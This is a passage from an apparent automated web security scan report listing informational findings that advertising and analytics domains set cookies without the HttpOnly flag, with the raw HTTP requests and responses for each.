Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:41:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7249%3D1%262876%3D1%264212%3D1%264940%3D1%265364%3D1%265421%3D1%267203%3D1%262827%3D1%266045%3D1%265085%3D1%267911%3D1%264894%3D1; expires=Tue, 04-Oct-2011 02:41:19 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D14009%2C182%2C2%2C%2C%267249%3D14009%2C0%2C1%2C%2C%262876%3D14126%2C0%2C1%2C%2C%265364%3D14130%2C183%2C2%2C%2C%265421%3D14148%2C510%2C4%2C%2C%264940%3D14297%2C0%2C1%2C%2C%267203%3D14309%2C349%2C2%2C%2C%262827%3D14309%2C349%2C2%2C%2C%266045%3D14309%2C349%2C2%2C%2C%265085%3D14658%2C0%2C1%2C%2C%267911%3D14658%2C0%2C1%2C%2C%264894%3D14658%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 02:41:19 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1986=6422714091563403120; expires=Tue, 04-Oct-2011 02:41:19 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.156. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7259&nid=2211&put=4612741554684080402&expires=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; nus_2046=0.00; ses2=5032^2&9346^1; ruid=154e62c97432177b6a4bcd01^2^1315103145^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4642/5271; rdk15=0; ses15=5032^2&9346^1&5271^1; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1; expires=Tue, 04-Oct-2011 02:25:48 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 02:25:48 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2211=4612741554684080402; expires=Mon, 05-Sep-2011 02:25:48 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.157. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5421&nid=2054&put=6731d4ad-7dae-4402-b507-a0bc233d79fb&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: rpb=7249%3D1%262876%3D1%264212%3D1%264940%3D1%265421%3D1%267203%3D1%262827%3D1%266045%3D1%265364%3D1; rpx=4212%3D14009%2C182%2C2%2C%2C%267249%3D14009%2C0%2C1%2C%2C%262876%3D14126%2C0%2C1%2C%2C%265364%3D14130%2C183%2C2%2C%2C%265421%3D14148%2C161%2C3%2C%2C%264940%3D14297%2C0%2C1%2C%2C%267203%3D14309%2C0%2C1%2C%2C%262827%3D14309%2C0%2C1%2C%2C%266045%3D14309%2C0%2C1%2C%2C; put_1185=9033442320916087634; put_2146=be87drgxhtfzsrxhqyctzbxiopqjem1y; put_2046=WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; put_2054=6731d4ad-7dae-4402-b507-a0bc233d79fb; put_1994=gl99ih0j0xqn

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:59:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267249%3D1%265421%3D1; expires=Tue, 04-Oct-2011 03:59:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%5D%5D%3E%3E%267249%3D14659%2C0%2C103%2C%2C%265421%3D14659%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 03:59:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2054=6731d4ad-7dae-4402-b507-a0bc233d79fb; expires=Tue, 04-Oct-2011 03:59:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.158. http://pixel.traveladvertising.com/Live/Pixel.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /Live/Pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Live/Pixel.aspx?PlacementId=49600 HTTP/1.1
Host: pixel.traveladvertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: tan_rt_49602=49602; CookieId=a91131c07f69440bb20ad255c280721b; tan_rt_49600=49600

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 03:59:36 GMT
Last-Modified: Sun, 04 Sep 2011 03:59:36 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: tan_rt_49600=49600;Path=/;Domain=.traveladvertising.com;Expires=Tue, 04-Oct-2011 03:59:36 GMT
Set-Cookie: CookieId=a91131c07f69440bb20ad255c280721b;Path=/;Domain=.traveladvertising.com;Expires=Sat, 29-May-2060 03:59:36 GMT
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........L..;

16.159. http://plg3.yumenetworks.com/dynamic_preroll_playlist.vast2xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plg3.yumenetworks.com
Path:   /dynamic_preroll_playlist.vast2xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.vast2xml?domain=459ZHfrwnWO HTTP/1.1
Host: plg3.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ymbt=0rO0ABXcQAAAAAQAAAQQAAAU7AAAAAA**

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:56 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: ymbt=0rO0ABXcQAAAAAQAAAQQAAAU7AAAFPg**; Domain=.yumenetworks.com; Expires=Tue, 03-Sep-2013 03:18:56 GMT; Path=/
Set-Cookie: ymdt=0rO0ABXcSAAAFPgAAAAAAAAAAAAA_AAAA; Domain=.yumenetworks.com; Expires=Fri, 14-Oct-2011 03:18:56 GMT; Path=/
Ypp: @YD_1;1223_0
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=50_23_123_106_0VzmEGyAz89Iy4; Domain=.yumenetworks.com; Expires=Tue, 13-Dec-2011 03:18:56 GMT; Path=/
Content-Type: text/xml
Content-Length: 73
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0">

</VAST>


16.160. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC01[CE]; Expires=Fri, 2 Sep 2016 04:18:09 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:09 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www325
Content-Length: 0
Content-Type: text/plain
Connection: close


16.161. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC02[CE]; Expires=Fri, 2 Sep 2016 04:18:10 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:10 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www379
Content-Length: 0
Content-Type: text/plain
Connection: close


16.162. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC00[CE]; Expires=Fri, 2 Sep 2016 04:18:08 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:08 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www298
Content-Length: 0
Content-Type: text/plain
Connection: close


16.163. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064?AQB=1&ndh=1&t=3/8/2011%2021%3A28%3A24%206%20300&ce=UTF-8&ns=premiumtv&pageName=Perform%20E-player%20V2%2013911%20-%20Test&g=http%3A//adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1%3F&r=http%3A//timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms&c6=MLS&c7=13911&v7=13911&c8=Perform%20E-player%20V2%2013911%20-%20Test&v8=Perform%20E-player%20V2%2013911%20-%20Test&c10=en_GB&c18=adstil.indiatimes.com&s=1920x1200&AQE=1 HTTP/1.1
Host: premiumtv.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:22:18 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=premiumtv.122.2o7.net; Path=/
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi=[CS]v1|27317111051D0C68-40000129E0170BDC|bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga|27317428051D1BE5-40000108A01781F0[CE]; Expires=Fri, 2 Sep 2016 03:22:18 GMT; Domain=premiumtv.122.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 03:22:18 GMT
Last-Modified: Mon, 05 Sep 2011 03:22:18 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62EEEA-18C9-13BF084A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www279
Content-Length: 1
Content-Type: text/html


16.164. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC00[CE]; Expires=Fri, 2 Sep 2016 04:18:08 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:08 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www282
Content-Length: 0
Content-Type: text/plain
Connection: close


16.165. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073 HTTP/1.1
Host: premiumtv.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:18:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bx60wx7Fx7Bgx7Ffdwbx7Eskwx60ga=[CS]v4|0-0|4E62FC02[CE]; Expires=Fri, 2 Sep 2016 04:18:10 GMT; Domain=.2o7.net; Path=/
Location: http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 04:18:10 GMT
Last-Modified: Mon, 05 Sep 2011 04:18:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www312
Content-Length: 0
Content-Type: text/plain
Connection: close


16.166. http://privacy.revsci.net/optout/optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optout.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/optout.aspx?a=1&p=http://www.networkadvertising.org&nocache=2.459788E-02 HTTP/1.1
Host: privacy.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv38FMJbiprpr4pgtCoa4a5xWExsOFqd64VnOKEYktoA24C/Ef+EZx1Twi0VADHUAlWk1TBjtT/2wnC6cxBIL3UgC39ISGlxvNxpO1oE0PLF3lKZ1eQq53SUKdS/qq/nNz4iZtcnTXD4iJTfaogQ3MSCq8mqbKhgKfOgOhC+Skc/P20cerX3Xtn8x2Tg57iLmhn5VQ0d5f9VPDzx6GAB9kD+rzx8V/IIzOmhoiWkpNqDJYG0rudGFCpEE3z8NZEw/S0otIypuzNuO1GjcG2YfSplGNhzWWAeY58TBvMrLba24vGp4xXT/9NE8rRl7JYWg5dAoMwfBDHBPRiMmUjfmfj5iE2BJ/yJTB8x3Q2uD0ayEAlhbg+55kuVXtrdg5QNiQuFzMMSSg5AB5A5PEfiLGlDe7AS0lHizhvMPwozEUDRRF2Z2Ar3Er7l6nnASLKWLksCGwfnyIj8jdIqZUxgDjxLhFEW86A2Wj1ING+F1tBHwgXAopFzMsNLaOYfjK4Sjm2BxKI58zliylLdXlqhimol4D+LoKuE2SG+NsQrWR9fahC6aB7SHsyUqJL+VIL+SlbiOKCRr/zGS8ri9i10yXQuP+hVzAaDO2XJHZA5r52gi3+c/5nAIDMvZvWL+14BRDbo/fqhY2cENg3zMwC0lpAv8KsUYiRXkDGEdU0N4MyDFW++3rom4Q8TgytGdfG8bldhmHocPcH6QQqLASsZ8Of2g2SGZWGPrV8zujE28C1OH4S5vrTMm/5wrCgJTlflBSmSogRkoIGyA1XMDChko0HCLF8nJakqfhMLV5MS1kbL/tXQX5BvgJR8ACuqio0XBjFb9JKtX0r+bnLUxLHy1TcjLaPSqGy3RZDY5hm1KcEZIrs++s4/ynkigb88vqv00+3C42ZxsKH/Xc3w5BUu1606GbIiD5tiegmwuLRaqVzkeQLaNSoBc4cjaoXuA+HQZN3QnnC6yxyVviBT8jmQVYoTTj4tv417hPYBLsLr16d/Bm2YQxuHd6cZUgMwfs=; rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4ddJjwAHYhBTtuzLxVqYeIB0dM92NsMncA2vI0bDxRRGXldzihH0IzTP2420rfnAJFmebfJ6fSvpAKtGju2Y3H4gP/EkEw6MsyuSHW/2xtsaZWEFZK/sd90fA29DzLYQ+mnsQwg9YdRKYn1CT2JvnAlnRAy+d8yVT/61iEsA/KMmYUKQl/ikKOeS/20ZueyAwRhbpaBfCideOdViY=; rtc_pDT9=MLsvs6VKcT5nJpHGUMPJYuYyUHdqT6LR5ubEw8DRmRbUsThoweg2YcRkyKTtsHnzuxhOY0svIo4EwvbsI9iWksJEsNye+cO+VgHGU5I2hW/5sJYPREd5O/RVikVLzd1fVDIUkMdnDge2al5lAtMrqZqvX1PQhVdQeeA07d84VZJvRpHiKXxQxpj96Sp819Pc5gIE8o5fzY8E9FhLN79SCKxX5zSKwb+hNOx8oJigjIieMQ+pIUGFPbqI3kFJCs7ckNmHCfg2/pF06ypumLzJhmG843Oo0p9CAO+W8uOWJF7zzF8aGie5IiALrJTDd3bZMCj8AQCRYoYeunfKrl/Kyr2+PSP7As+nEey/smtwluNh3SiAAgvwh3ilNo2CQ7jP8ky61SxOEdIdZFwgrh65bvjxpUjFVvSDu8nmiGjaSNanK8XrObNSbZOAwMcKBq7X4NPBqQ==; rsiPus_ymv_="MLtXrl8utl9roAD3CtgJ/MCFqswSrgQEEn5bOqftJtmLJM2JICAiAWoJ5Yu9t3o3dNI8YWdfjMovFAR/OZkpwpGNH1PYq9aujcCUJDf2RXbI06MnSt3p6UHAdBI9wM957Uo//6a6z6+lB+zj1YJH7Dqtxt8mIa9AcCG1YeF3e3fPbB2Xmo9mF1xKIsh1dXJeLZtjCZGHKJmUQzbomPNQZCnZcSEKFuBq/GePBRhQDIBYNt08QI07hfnOhRpDPs/xOSe38X5StA4wff7R4FFAg4ZLi316j3yILYrcop4d+isR0dMNEPscF1jOO5uMkT7Zi2EAiSMj"; 